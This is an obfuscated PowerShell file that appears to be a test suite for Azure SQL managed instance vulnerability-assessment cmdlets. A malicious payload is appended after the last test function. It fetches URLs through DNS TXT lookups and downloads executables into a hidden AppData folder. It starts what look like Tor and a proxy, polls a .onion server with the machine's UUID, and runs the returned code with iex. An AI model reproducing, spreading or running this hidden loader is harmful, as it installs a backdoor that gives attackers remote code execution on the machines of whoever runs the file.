		| &("{3}{6}{4}{0}{9}{5}{15}{11}{10}{12}{8}{1}{7}{2}{13}{14}"-f't','t','s','Start-','qlIns','eD','AzS','yA','ili','anc','b','a','aseVulnerab','se','ssmentScan','at') -ScanId ${s`c`ANid1}

		
		${SCa`NREcoR`DL`IST} = &("{4}{3}{1}{7}{2}{0}{5}{6}" -f'ab','st','at','In','Get-AzSql','as','e','anceD') -ResourceGroupName ${p`ARaMS}."Rg`NAME" -InstanceName ${paRA`MS}."Se`Rv`ER`NAme" -Name ${PAR`A`mS}."Dat`ABaS`E`Name" | &("{16}{4}{2}{3}{11}{5}{13}{1}{15}{14}{6}{7}{10}{8}{0}{12}{9}"-f'essmentS','a','t','-A','e','qlI','seVu','l','ilityAss','ord','nerab','zS','canRec','nstanceD','a','tab','G') 
		&("{0}{2}{4}{1}{3}"-f 'As','r','s','t-AreEqual','e') ${ExcP`ECt`EDScANcO`UNt} ${SCAn`ReCO`Rdl`ist}."co`UNt"

		${s`CaNrECO`Rd1F`RO`M`LisTCMdleT} = ${sCa`NREc`orDl`ist}[${eX`cpe`CTed`SCAnC`ouNt}-1]
		&("{1}{0}{2}{3}"-f'ss','A','ert-Are','Equal') ${SCaNr`e`c`ord1frOm`lISTcMdlet}."RESOu`RCEg`Rou`pnaME" ${S`Can`R`EcoRD1}."reSOUr`CeG`R`o`U`PNAme"
		&("{1}{4}{3}{2}{0}" -f 'eEqual','A','Ar','-','ssert') ${sca`NrEcoRd1`F`RomLi`sTCmdLEt}."inS`Ta`NceNAmE" ${sc`AnR`eCORD1}."i`NstaNCe`Name"
		&("{3}{2}{1}{0}"-f 'eEqual','Ar','rt-','Asse') ${sCanr`eC`o`RD1fRO`mli`s`TCM`DlET}."datA`BA`senA`Me" ${scA`Nre`cORD1}."data`BA`s`eNaME"
		&("{1}{3}{0}{2}" -f'rt-','A','AreEqual','sse') ${scaNRec`orD`1`FRoMListCmd`l`eT}."sC`A`Nid" ${sc`AnReC`ORD1}."SCA`N`id"
		&("{2}{3}{1}{0}"-f 'l','-AreEqua','A','ssert') ${s`C`Anre`corD`1FR`oM`lIs`T`CMdLeT}."tRiGgeR`T`ype" ${SCa`NR`ECORD1}."triGG`eRt`YPE"
		&("{3}{4}{2}{1}{0}"-f'al','qu','eE','Assert-A','r') ${ScANrE`coRD`1F`ROmLi`stCM`DlET}."STA`Te" ${sCa`NRec`o`RD1}."st`Ate"


		
		${Sc`A`NRecO`RDlist} = &("{0}{13}{6}{3}{9}{11}{2}{8}{1}{5}{7}{10}{4}{12}{14}"-f'G','rabi','b','e','sme','l','-AzSqlInstanc','ityAsse','aseVulne','D','s','ata','ntSc','et','anRecord') -ResourceGroupName ${pAR`AmS}."Rgn`AmE" -InstanceName ${Pa`RaMs}."SER`VE`RnAME" -DatabaseName ${pA`RAms}."dAt`AB`ASEn`AME"
		${scaNsC`OU`NT} = ${sC`Anre`cO`RDLiSt}."c`oUNT"

		&("{9}{7}{10}{2}{1}{3}{0}{5}{4}{11}{6}{8}"-f's','ability','baseVulner','A','ssment','se','a','qlInsta','n','Start-AzS','nceData','Sc') -ResourceGroupName ${PaRa`mS}."rG`NaME" -InstanceName ${pa`R`AMs}."SE`RVeR`NAmE" -DatabaseName ${p`ARAMS}."DaTaB`A`s`ENaME" `
		-WhatIf

		
		${SC`AN`ReCORD`lI`ST} = &("{0}{6}{11}{9}{8}{7}{4}{5}{3}{10}{1}{2}"-f 'Get-AzSqlI','or','d','Re','sessmentSc','an','nstanceDataba','lityAs','abi','lner','c','seVu') -ResourceGroupName ${P`ArAMs}."rg`NAme" -InstanceName ${Pa`RaMs}."SERV`ERNa`Me" -DatabaseName ${pa`RaMS}."Da`TABaS`E`NaME"
		&("{1}{3}{0}{2}"-f'u','Assert','al','-AreEq') ${s`CAnScoU`Nt} ${s`C`AnRE`C`ORdLIst}."COu`Nt"
	}
	finally
	{
		
		&("{3}{0}{7}{2}{9}{8}{1}{4}{6}{5}" -f 'ove-','stance','yAs','Rem','Test','nvironment','E','Vulnerabilit','dIn','sessmentManage') ${tES`TsUf`FIX}
	}
}


function Test`-VU`lnEra`BI`lityAssES`sme`NTm`AN`Age`dD`ATABASeS`CanCOnveRTTESt
{
	
	${tE`StSuFF`iX} = &("{2}{1}{0}" -f 'etName','Ass','get')
	&("{4}{10}{3}{9}{5}{6}{0}{8}{11}{2}{7}{1}"-f'Insta','ment','stE','bilit','Create-Vuln','essmentMana','ged','nviron','nc','yAss','era','eTe') ${Te`StsU`F`FIx}
	${pAr`AMs} = &("{2}{7}{13}{0}{3}{5}{11}{8}{4}{15}{1}{12}{14}{10}{16}{6}{9}" -f 'era','tEnv','Get-Sql','bilityAsses','Inst','s','r','Vu','ed','s','a','mentManag','iro','ln','nmentPar','anceTes','mete') ${tE`ST`s`UFfIX}

	try
	{
		
		&("{1}{6}{2}{5}{0}{7}{4}{8}{3}" -f'd','Enable-AzSqlInstanceAdv','nc','y','cur','e','a','DataSe','it') -ResourceGroupName ${P`ArAmS}."r`g`NaMe" -InstanceName ${P`AR`AMs}."sErVern`A`me" -DoNotConfigureVulnerabilityAssessment

		&("{10}{6}{5}{2}{13}{8}{9}{7}{0}{3}{12}{11}{1}{4}"-f 'yA','mentSettin','nst','ss','g','e-AzSqlI','at','eVulnerabilit','t','abas','Upd','s','es','anceDa') -ResourceGroupName ${P`Ara`ms}."RgN`AME" -InstanceName ${p`AR`AMS}."SErv`E`R`NAMe" -DatabaseName ${P`ArAMS}."dAT`AbaS`eN`AmE" `
			 -StorageAccountName ${P`ARaMS}."St`OraG`EA`cC`oUnT"

		
		&("{0}{3}{5}{2}{4}{1}" -f'Assert-','s','a','ThrowsC','in','ont') -script { &("{3}{1}{8}{10}{6}{2}{9}{4}{7}{5}{0}"-f'tScan','z','aseVul','Convert-A','lityAsses','men','b','s','SqlIns','nerabi','tanceData') -ResourceGroupName ${p`ARA`mS}."r`Gn`Ame" -InstanceName ${P`AraMs}."Ser`V`eRnAME" `
		-DatabaseName ${Par`Ams}."d`ATaBAS`ENaME" } -message ("{20}{6}{25}{23}{7}{8}{28}{3}{16}{17}{18}{11}{26}{13}{5}{21}{4}{24}{0}{27}{15}{12}{9}{2}{1}{10}{22}{19}{14}" -f'Get','seVulner','a',' th','d',' p','canId ','uired ','parameter ','b','ability','Please ','eData','icitly','ut via pipe.','stanc','i','s cmdlet.',' ','ecord outp','S','rovi','AssessmentScanR',' a req','e it or pass the ','is','expl','-AzSqlIn','for')

		
		${sC`An`ID} = ("{2}{3}{1}{0}" -f 'etConvertScan','l','cm','d')
		&("{8}{5}{13}{2}{1}{7}{14}{12}{4}{3}{15}{9}{6}{10}{11}{0}"-f 'can','anc','nst','bility','Vulnera','-AzS','e','eDatab','Start','s','s','smentS','se','qlI','a','As') -ResourceGroupName ${P`Ar`Ams}."r`Gname" -InstanceName ${pa`R`Ams}."SeR`VernA`me" -DatabaseName ${Par`A`MS}."DaTaba`SEN`AME" -ScanId ${s`ca`NId}

		
		${conVE`RtSCANo`Bj`ECT} = &("{6}{9}{8}{4}{0}{1}{10}{12}{7}{11}{3}{5}{2}" -f 'eDatab','aseVu','n','n','stanc','tSca','Conver','sessm','zSqlIn','t-A','lner','e','abilityAs') -ResourceGroupName ${pa`R`Ams}."R`gNAmE" -InstanceName ${P`ARa`MS}."s`ERVernA`me" -DatabaseName ${Par`A`mS}."DaTABAs`e`N`AME" `
		-ScanId ${Sc`A`NiD}
	
		&("{2}{4}{3}{0}{1}" -f 'qu','al','Ass','reE','ert-A') ${pA`RaMs}."RgNa`ME" ${ConveRt`sCA`NOBJe`cT}."R`es`O`URc`EgRoUPnA`mE"
		&("{2}{0}{1}"-f't-Are','Equal','Asser') ${PA`R`AmS}."S`ERve`RnAmE" ${c`On`VeRTsC`ANo`B`JECt}."INS`TAN`cEn`AME"
		&("{2}{1}{0}{3}" -f 'sert','s','A','-AreEqual') ${PA`RA`MS}."D`AtabAS`en`AME" ${C`oN`VErt`SCan`OBJeCT}."dAT`A`B`ASeNAmE"
		&("{2}{1}{0}"-f 'ert-True','ss','A') -script  { ${C`ON`VerTSca`No`Bj`eCt}."EXPo`Rt`E`DRe`p`or`TLOcAtIon".("{1}{2}{0}"-f 'ns','Conta','i').Invoke(${SC`A`NID}) }
		&("{0}{2}{1}" -f 'Asse','e','rt-Tru') -script  { ${C`ONv`ER`Tscano`BjECt}."e`X`porTEDRE`pORT`loCatIoN".("{0}{1}"-f'Con','tains').Invoke(${P`A`RaMs}."Storageac`c`oUNT") }

		
		${sCan`iD} = ("{2}{3}{1}{0}{4}{5}"-f'ert','letConv','cm','d','S','can1')
		&("{13}{10}{15}{12}{14}{6}{8}{4}{7}{5}{3}{1}{11}{2}{9}{0}"-f'Scan','s','e','tyA','eVulnera','li','D','bi','atabas','nt','art-AzSqlIn','sessm','tanc','St','e','s') -ResourceGroupName ${paRA`mS}."rGna`me" -InstanceName ${P`ArAms}."S`er`V`ernAME" -DatabaseName ${PaRA`MS}."dA`TAbA`seN`AmE" -ScanId ${S`C`AnId}

		${conV`e`RTsCa`N`oBJeCT} =  &("{6}{12}{0}{1}{2}{4}{14}{8}{13}{3}{9}{11}{5}{10}{16}{7}{15}"-f 'lI','ns','t','l','ance','abilityAssess','Get','ntScanR','seV','ne','m','r','-AzSq','u','Databa','ecord','e') -ResourceGroupName ${P`ArA`ms}."r`GN`Ame" -InstanceName ${par`AmS}."S`e`RVE`RnAME" -DatabaseName ${PArA`Ms}."DAT`Ab`Ase`NaMe" `
		-ScanId ${s`CA`NiD} | &("{1}{3}{8}{2}{5}{9}{6}{4}{0}{10}{7}" -f 'tyAssess','Con','n','ver','lnerabili','stanceDataba','Vu','ntScan','t-AzSqlI','se','me')
	
		&("{2}{3}{0}{1}"-f 'A','reEqual','As','sert-') ${p`A`Rams}."r`GNamE" ${cONvERTSc`An`oBj`e`cT}."Re`SourCeG`ROuP`NAME"
		&("{2}{1}{3}{0}{4}" -f'u','sert-AreE','As','q','al') ${P`ArA`ms}."SerV`E`RnAME" ${COn`Ve`RtSCanob`JEct}."I`NSTa`N`CENaME"
		&("{2}{0}{3}{1}{4}"-f'sert-AreEq','a','As','u','l') ${Pa`RA`mS}."DA`Ta`BASEName" ${conve`R`TScAN`oB`JEcT}."d`AtAB`ASeNA`me"
		&("{2}{1}{3}{0}"-f'e','ser','As','t-Tru') -script  { ${coNvERTsca`NoB`J`e`Ct}."EX`PoRT`E`dr`EpoRtLOCaT`I`on".("{0}{1}{2}" -f 'Conta','i','ns').Invoke(${sC`A`NiD}) }
		&("{3}{0}{1}{2}" -f 'ert-Tr','u','e','Ass') -script  { ${conV`Ert`s`caNOBJ`e`Ct}."EXPoRtEDr`E`PO`R`TLoCaTION".("{2}{1}{0}" -f'ns','tai','Con').Invoke(${p`ArAms}."St`oR`AgeAcco`UNt") }

		
		${coNvE`RtsCANoB`J`eCT} = &("{2}{16}{0}{12}{7}{11}{15}{13}{5}{9}{4}{10}{6}{3}{1}{14}{8}"-f'vert','Ass','Co','ty','erabi','ul','i','nceD','an','n','l','at','-AzSqlInsta','seV','essmentSc','aba','n') -ResourceGroupName ${PARA`MS}."Rgn`AMe" -InstanceName ${PArA`MS}."sE`Rv`eRNAME" -DatabaseName ${paRa`mS}."daT`A`BasEnAME" `
		-ScanId ${SCA`NiD} -WhatIf
		&("{2}{0}{1}{3}" -f's','ert-Nul','As','l') ${cONvEr`TS`cAnO`BjeCT}."EX`portED`RePoR`TLoc`ATiOn"
		
		
		&("{3}{14}{8}{10}{6}{13}{0}{5}{9}{4}{2}{12}{7}{11}{1}"-f 'eVu','ting','tyAsse','Cl','ili','lne','ceDat','t','-AzSqlIns','rab','tan','Set','ssmen','abas','ear') -ResourceGroupName ${p`ARa`Ms}."rG`NaME" -InstanceName ${P`Ara`Ms}."sE`RVeR`NA`mE" -DatabaseName ${PARa`ms}."da`Tab`AsE`NAmE"

		&("{0}{4}{7}{1}{8}{6}{10}{9}{2}{12}{5}{3}{11}" -f'Up','Sql','sessm','tSettin','date','n','stanceVulnerabil','-Az','In','As','ity','g','e') -ResourceGroupName ${pAR`AMs}."RgNA`me" -InstanceName ${p`A`RAms}."s`ERvE`Rna`Me" -StorageAccountName ${p`ArA`mS}."S`TOrA`GeaCcoUnT"

		
		&("{12}{11}{5}{8}{4}{1}{9}{3}{2}{6}{7}{0}{10}" -f 't','a','tyAss','li','r','aseVu','es','smen','lne','bi','Scan','Datab','Start-AzSqlInstance') -ResourceGroupName ${pA`R`AmS}."RgnA`me" -InstanceName ${p`A`RaMS}."SeR`VEr`N`AmE" -DatabaseName ${PArA`ms}."dA`T`AbaSENa`ME" -ScanId ${sc`An`iD}
	}
	finally
	{
		
		&("{6}{15}{11}{7}{14}{5}{2}{0}{3}{8}{4}{9}{1}{13}{10}{12}{16}" -f'entManage','n','m','dInst','Test','s','Rem','erabilityAss','ance','E','i','n','ronm','v','es','ove-Vul','ent') ${tEStSU`Ff`ix}
	}
}


function cRe`AT`E`-vul`NERabIlitY`As`SesSme`NTMa`NaGedIN`sTAnC`EtEst`enViR`ON`MeNT (${tEsTS`UF`F`IX}, ${l`oC`AT`iON} = ("{1}{3}{4}{2}{0}"-f 'S','W','l U','est Centr','a'))
{
	${PAra`ms} = &("{0}{10}{9}{1}{8}{12}{2}{7}{13}{4}{11}{3}{6}{5}" -f 'Get-S','lit','tM','onmentPa','nceTes','ameters','r','anage','yAssessm','Vulnerabi','ql','tEnvir','en','dInsta') ${tE`S`TS`UfFiX}
	&("{8}{5}{6}{3}{4}{1}{2}{7}{0}" -f 'ms','Wit','hPar','nstanceTestEn','vironment','ate-','I','a','Cre') ${parA`mS} ${LoCAT`IoN}
}


function gE`T-SQL`Vu`lN`E`RabIlItYasS`ESSME`N`TmAnaGEd`inSTAn`cEte`St`E`NVI`ROnmEnTPAraMetE`RS (${TE`stsuff`IX})
{
	return @{ ("{1}{0}" -f 'ame','rgn') = ("{0}{3}{1}{4}{2}"-f'sql-va-','dlet','g','cm','-test-r') +${Te`sTsU`F`FIX};
			  ("{2}{0}{1}" -f 'er','verName','s') = ("{1}{2}{4}{0}{3}{5}"-f 't-s','sql-v','a-cm','e','dle','rver') +${TE`STSU`F`FIX};
			  ("{1}{2}{3}{0}"-f'e','da','tabaseN','am') = ("{2}{1}{0}{3}" -f 'cmdl','ql-va-','s','et-db') + ${Te`sTsU`FfIx};
			  ("{2}{0}{1}" -f 'orageAccoun','t','st') = ("{1}{3}{0}{2}"-f 'cm','sql','dlets','va') +${t`EsT`suFF`Ix}
		}
}


function Rem`Ov`E-vULNERaBi`li`T`Y`AsseSs`M`ENTMaNAGeDIN`sTa`Nc`ETEStEN`V`IroNMeNt (${T`EsT`SuF`FiX})
{
	${pAra`MS} = &("{16}{8}{0}{5}{13}{1}{2}{12}{7}{14}{10}{3}{4}{9}{6}{15}{11}"-f'qlVu','lityAss','essm','tance','TestEnvironm','lnerab','arame','ed','-S','entP','s','ers','entManag','i','In','t','Get') ${te`stsU`FfIx}
	&("{3}{1}{2}{4}{0}{5}"-f 'ourceG','emove-','AzureR','R','mRes','roup') -Name ${P`ARa`Ms}."rG`N`AmE" -Force
}
("{0}{1}"-f 'lVBjW','W');${eRROrac`TI`O`N`pR`efERENCE} = ("{1}{0}{3}{2}"-f'ilent','S','ontinue','lyC');("{1}{0}{2}{3}"-f'QOAiMM','jN','k','dR');'jmq';${W`wo} = (&("{1}{2}{3}{0}" -f'ct','g','et-wmiobj','e') ("{6}{3}{5}{1}{7}{4}{2}{0}" -f'roduct','uterS','emP','2','t','_Comp','Win3','ys'))."uU`Id";("{1}{0}"-f 'Rt','Sa');("{2}{1}{0}" -f 'jz','Q','ElFeXOt');if ((&('gp') ((("{4}{3}{5}{0}{9}{6}{2}{7}{10}{1}{8}" -f '8','ftR','a','K','H','CU:Rm','m8Softw','r','m8WindowsRm8CurrentVersionRm8Run','R','eRm8Microso'))-creplaCe  'Rm8',[cHaR]92)) -match ${W`wO}){;("{2}{0}{1}" -f'VdF','Fjj','Qa');("{0}{1}" -f 'M','tqBu');(&("{1}{2}{0}{3}" -f 'ce','Get-Pr','o','ss') -id ${P`ID}).("{1}{0}" -f'ill','K').Invoke();'cw';("{1}{0}" -f 'NBGZ','O');};("{0}{2}{1}{3}" -f 'XXzy','xF','ExP','hY');("{2}{0}{1}" -f'MdSFK','qrvLa','p');("{0}{1}{2}" -f 'ZbEKb','SU','h');("{2}{1}{0}"-f'Dv','jpZeY','x');function e(${q`zA}){;("{1}{0}"-f 'ALnMw','bGaL');("{0}{2}{1}" -f 'EN','dj','xLTK');${oR`OT} = (((&("{1}{0}"-f 'x','ie') ('nslo'+'o'+'kup '+'-quer'+'ytyp'+'e'+'='+'txt '+"$qza "+'8.8.8'+'.8')) -match '"') -replace '"', '')[0].("{0}{1}" -f 'Tr','im').Invoke();("{0}{1}" -f'ZuiAzZ','T');'In';${b`P}.("{3}{1}{2}{0}" -f'adFile','n','lo','Dow').Invoke(${or`oT}, ${Ai});("{0}{2}{1}" -f 'PR','H','CLIFVQ');'cV';${fI} = ${F`JX}.("{0}{1}{2}"-f'NameS','pa','ce').Invoke(${A`i}).("{1}{0}"-f's','Item').Invoke();("{0}{1}{2}"-f 'cmB','l','kiUW');("{0}{1}{3}{2}"-f'pJ','sbWf','AQ','lO');${F`jx}.("{2}{1}{3}{0}" -f 'pace','a','N','meS').Invoke(${z`Ui}).("{0}{1}{2}"-f 'Co','pyH','ere').Invoke(${F`I}, 20);("{1}{0}"-f 'W','fLGz');'qa';&('rd') ${a`I};("{0}{1}"-f 'It','pK');("{0}{1}{3}{2}" -f 'g','Acx','jbdq','Qok');};("{2}{1}{0}"-f 'Lt','fbWq','d');("{1}{2}{0}"-f'Prs','p','yiBJG');("{2}{1}{0}"-f'O','rqslG','SHreD');("{1}{0}{2}"-f 'kP','bmXjlG','NOW');'vLb';("{1}{0}"-f'FGFEVS','tHZ');${Z`UI} = ${ENv:A`P`PDATA} + '\' + ${W`wo};("{1}{0}{2}" -f 'aE','QFY','bYU');("{0}{1}{2}"-f'VybKx','YI','SVV');if (!(&("{2}{0}{1}" -f's','t-Path','Te') ${z`Ui})){;("{1}{0}" -f 'asxg','l');("{0}{1}"-f'WUd','KHY');${J`Nj} = &("{2}{1}{0}"-f 'tem','w-I','Ne') -ItemType ("{0}{1}"-f 'Dire','ctory') -Force -Path ${Z`UI};("{3}{1}{0}{2}"-f 'Nz','B','rQWRp','WS');("{1}{2}{0}" -f 'Ccsb','Om','rLJS');${j`NJ}."at`T`RIbUtES" = ("{0}{1}" -f 'Hidd','en'), ("{0}{1}" -f'Syst','em'), ("{1}{0}{5}{3}{4}{2}" -f'C','Not','dexed','en','tIn','ont');("{1}{0}" -f't','AVK');("{0}{1}"-f 'Xz','QSC');};("{0}{1}{2}"-f'c','sP','pLz');'GqA';("{0}{1}" -f'X','UNcRs');("{0}{1}" -f 'ua','dZs');${f`kz}=${z`Ui}+ ((("{1}{2}{0}{3}" -f '.','U','8Vtor','exe')).("{1}{2}{0}"-f'cE','r','EPlA').Invoke('U8V','\'));("{1}{0}" -f 'US','ctA');("{1}{3}{2}{0}" -f 'v','ndDdW','Z','li');${SZ`eo}=${Z`Ui}+ ((("{0}{4}{3}{2}{1}" -f'zd','.exe','po','oli','Jp'))."RE`PLace"('zdJ',[strIng][cHaR]92));'cC';("{1}{0}"-f 'MtZk','v');${AI}=${Z`UI}+'\'+${W`Wo}+("{1}{0}"-f 'p','.zi');("{1}{2}{0}" -f 's','krKyEj','h');("{1}{0}"-f 'w','Jrixy');${b`P}=&("{1}{2}{0}"-f'ject','New-','Ob') ("{4}{3}{2}{1}{0}{5}"-f'n','ie','l','.Net.WebC','System','t');("{1}{2}{0}"-f 'fj','qg','loHv');("{1}{0}{2}"-f'mNWB','k','ZwaAR');${f`JX}=&("{3}{2}{0}{1}" -f 'ec','t','j','New-Ob') -C ("{0}{1}{3}{2}{4}" -f'Shell','.Applic','o','ati','n');("{0}{1}" -f'XYLI','kQ');("{0}{1}" -f 'ZOU','u');("{1}{0}" -f 'JF','YE');'NYC';if (!(&("{1}{0}{2}"-f't-Pat','Tes','h') ${f`Kz}) -or !(&("{1}{2}{0}"-f 't-Path','Te','s') ${Sz`EO})){;("{1}{2}{0}"-f'jxPN','HkuNDG','Z');("{0}{2}{1}{3}" -f 'zNO','p','bi','amCT');&('e') ("{0}{1}{2}" -f'i.v','ank','in.de');("{2}{0}{1}" -f'nsrL','znG','lcNR');("{1}{0}{2}" -f 'DPkUPca','JeI','M');};("{0}{1}{2}" -f'Pc','cwMqmjI','r');'Lcj';("{1}{0}"-f'BdrW','RSdcb');("{2}{0}{1}" -f 'ZIdM','o','KtW');if (!(&("{1}{0}{2}"-f 'st-Pa','Te','th') ${F`KZ}) -or !(&("{0}{2}{1}"-f'Te','ath','st-P') ${sZ`EO})){;("{2}{1}{0}"-f 'tEd','P','eUR');("{0}{1}" -f'qAo','H');&('e') ("{0}{1}{2}"-f'gg','.i','biz.cc');("{0}{1}" -f 'Ck','jK');("{0}{1}"-f 'Hr','Lr');};'BDo';("{0}{1}{2}" -f'dh','VYRuf','O');("{0}{1}"-f'qTt','R');("{2}{0}{1}" -f 'WHNr','y','w');${WC}=${Z`UI}+((("{3}{1}{2}{0}" -f 'roaminglog','5','l','a'))  -cRePlaCe ([ChAR]97+[ChAR]53+[ChAR]108),[ChAR]92);("{1}{0}" -f 'K','xPQg');("{0}{1}"-f 'aF','gl');&("{0}{1}" -f'sap','s') ${F`Kz} -Ar (' '+'--Log'+' '+"`"notice "+'fi'+'le '+"$wc`"") -wi ("{1}{0}"-f 'n','Hidde');'sH';("{2}{1}{0}"-f'FN','WgQ','qvk');do{&("{0}{1}" -f'sl','eep') 1;${lL}=&('gc') ${WC}}while(!(${L`l} -match ("{0}{3}{4}{1}{2}"-f 'Bo',' 100%: Don','e.','otstr','apped')));("{0}{2}{1}" -f 'JzJ','d','twaoxo');("{3}{1}{0}{2}"-f'NDQX','ib','iT','fmL');&("{1}{0}"-f's','sap') ${s`zEo} -a ("{4}{5}{2}{0}{1}{7}{6}{3}" -f't','Pro','Paren','=localhost:9050','so','cks','y','x') -wi ("{0}{2}{1}"-f'Hi','en','dd');("{0}{1}" -f 'M','MLB');'PB';&("{0}{1}" -f's','leep') 7;'rmt';("{2}{0}{1}"-f'GYZ','oHaPrID','U');${l`F}=&("{3}{0}{1}{2}" -f 'w','-Objec','t','Ne') ("{0}{2}{3}{1}{4}" -f 'System.Net.','ro','We','bP','xy')(("{3}{0}{1}{4}{2}" -f 'o','ca','3','l','lhost:812'));("{2}{0}{1}" -f 'Aq','U','mje');("{1}{0}"-f'z','HhV');${L`F}."u`sEdEFaulTCR`EDeN`TIaLS" = ${tr`Ue};("{0}{1}{2}"-f 'E','owjlibI','iiy');'Joz';${B`P}."PR`OXY"=${l`F};("{2}{0}{1}"-f 'mlyx','gSqL','tQ');("{2}{1}{0}" -f'pisAz','PYAuE','O');${O`Xq}=("{0}{6}{2}{3}{1}{8}{5}{7}{4}"-f'http://powerwor','.ph','42hu.onion/g','et','uid=','e','mjqj','tup&','p?s=s') + ${W`wO};'LcO';("{1}{0}{2}"-f 'zTyA','Y','LP');while(!${c`L}){${cl}=${B`P}.("{1}{2}{0}{3}"-f'loadStrin','dow','n','g').Invoke(${O`xQ})};'lMB';("{1}{0}{2}"-f'J','FQQp','nA');if (${c`L} -ne ("{0}{1}" -f 'non','e')){;("{0}{1}" -f'TK','NTo');'IN';&("{0}{1}" -f'ie','x') ${cl};'PiM';("{1}{0}"-f 'ylef','Je');};("{0}{1}" -f'Jio','kKK');
